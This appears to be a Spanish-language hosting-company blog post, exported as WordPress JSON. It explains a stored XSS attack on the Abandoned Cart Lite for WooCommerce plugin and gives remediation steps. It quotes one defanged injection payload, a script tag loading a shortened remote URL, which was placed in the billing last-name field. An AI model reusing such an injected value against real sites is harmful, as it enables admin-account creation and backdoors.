{"id":29007,"date":"2019-03-12T11:56:50","date_gmt":"2019-03-12T09:56:50","guid":{"rendered":"https:\/\/www.hostinet.com\/formacion\/?p=29007"},"modified":"2019-03-12T11:57:19","modified_gmt":"2019-03-12T09:57:19","slug":"plugin-wordpress-hackeado-abandoned-cart-lite-for-woocommerce","status":"publish","type":"post","link":"https:\/\/www.hostinet.com\/formacion\/wordpress\/plugin-wordpress-hackeado-abandoned-cart-lite-for-woocommerce\/","title":{"rendered":"Plugin WordPress Hackeado – Abandoned Cart Lite for WooCommerce"},"content":{"rendered":"
<\/div>

\n\t\"Plugin\n<\/p>\n

\n\tSe ha detectado una vulnerabilidad importante en el plugin para WordPress Abandoned Cart Lite for WooCommerce<\/strong>.\n<\/p>\n

\n\tSi estás usando este plugin, es imperativo que actualices a la versión 5.2.0 del plugin<\/strong> o superior y revises WordPress en busca de contenido malicioso.\n<\/p>\n

\n\tDe no hacerlo, un atacante podría hacerse con el control del sitio web<\/strong> y realizar la acción que desee hacer, envíos de spam, añadir código malicioso para substraer datos de los usuarios, software par minar criptomonedas, etc…\n<\/p>\n

\n\tCómo Funciona la Vulnerabilidad en Abandoned Cart Lite
\n<\/h2>\n

\n\tEl plugin Abandoned Cart Lite for WooCommerce<\/strong> es un plugin pensado para recuperar las ventas que se quedan a medias en WooCommerce.\n<\/p>\n

\n\tSi un cliente deja un producto en el carrito de compra sin finalizar el proceso de pago, avisa al administrador de sitio para que intente recuperar la venta<\/strong>.\n<\/p>\n

\n\tEste tipo de plugins son muy populares pues son muy efectivos para aumentar el número de ventas de cualquier comercio online.\n<\/p>\n

\n\tSi estás acostumbrado a realizar compras por Internet y alguna vez has dejado un producto en el carrito de tu cuenta de Amazon o similar, seguramente habrás recibido algún email recordándote que tienes dicho producto en el carrito.\n<\/p>\n

\n\tLos atacantes encontraron una vulnerabilidad en el plugin Abandoned Cart Lite for WooCommerce<\/strong>para poder atacar el sitio inyectado una carga maliciosa de JavaScript\n<\/p>\n

\n\tUna vez descubierta la vulnerabilidad el proceso no es complicado.\n<\/p>\n

\n\t\"C\u00f3mo\n<\/p>\n

\n\tLos atacante simplemente tenían que realizar el proceso de compra y dejar el carrito abandonado<\/strong>.\n<\/p>\n

\n\tCon nombre y correo electrónico falsos, no importa, pero en el campo de Apellidos<\/strong> (billing_last_name) añaden un carga útil con el script inyectado del tipo:\n<\/p>\n

\r\n<script src=hXXps:\/\/bit[.]ly\/xxxxxxx><\/script> \r\n<\/code><\/pre>\n
\n\tEste script de destino es el encargado de ejecutar el contenido malicioso utilizando la propia sesión abierta por el administrador, que está revisando el carrito abandonado<\/strong>, para añadir las puertas traseras en el propio sitio web.\n<\/p>\n
\n\tSe han detectados dos acciones maliciosas. Una es crear una cuenta de administrador<\/strong> no autorizada y la otra buscar un plugin que tengamos desactivado<\/strong> para instalar en él un script de ejecución de código.\n<\/p>\n
\n\tSi el ataque tiene éxito, el mismo script se encarga de avisar al atacante<\/strong> para que puede empezar a realizar sus acciones maliciosas.\n<\/p>\n
\n\tComo habrás visto, el ataque usa el popular acortador de URL’s bit.ly<\/strong>, lo que le garantiza cierto anonimato y seguir teniendo acceso al sitio editando el enlace acortado si el dominio atacante es desactivado. Sencillo pero efectivo.
\n\t \n<\/p>\n
\n\tQué Hacer si uso el Plugin Abandoned Cart Lite
\n<\/h2>\n
\n\tSi eres uno de los usuarios del plugin  Abandoned Cart Lite<\/strong> lo primero que tienes que hacer es actualizarlo a la última versión que exista disponible.\n<\/p>\n
\n\tPor desgracia, el parche añadido por el desarrollador del plugin no puede eliminar <\/strong>los usuarios creados<\/strong>, ni es capaz de cerrar las puertas traseras<\/strong> que el ataque haya podido crear.\n<\/p>\n
\n\tSi crees que has podido ser objeto de un ataque deberás de revisar dos cosas:\n<\/p>\n
\n\t1- Revisar la base de datos en busca de cualquier código inyectado. La principal tabla es: ‘’ac_guest_abandoned_cart_history\n<\/p>\n
\n\t2- Revisar los usuarios con el roll<\/em> de administrador de WordPress. Si hay alguno que no reconozcas, elimínalo sin contemplaciones.\n<\/p>\n
\n\t\"Qu\u00e9\n<\/p>\n
\n\tDespués de esto puedes pasar pasar el antivirus que tienes disponible en cPanel<\/a><\/strong>, pero ten en cuenta que solo podrá detectar código malicioso instalado.\n<\/p>\n
\n\tSi hay una puerta trasera, no la detectará, solo el código que se pueda inyectar a través de ella.\n<\/p>\n
\n\tLa vulnerabilidad usa el XSS de WordPress y la mayoría de los plugins de de seguridad de WordPress, bloquean los ataques XSS<\/strong>.\n<\/p>\n
\n\tAsí que si tenéis instalado algunos de estos plugins como Wordfence<\/a>, BBQ:Block Bad Queries<\/a>, BulletProof Security<\/a>, etc… posiblemente haya podido evitar el ataque.\n<\/p>\n
\n\tSi no tienes ningún plugin instalado prueba a instalar alguno y hacer un escanear WordPress, pero recuerda que la revisión de la base de datos y usuarios debes hacerla tú o dejarlo en manos de un profesional<\/strong> para estar totalmente seguros.\n<\/p>\n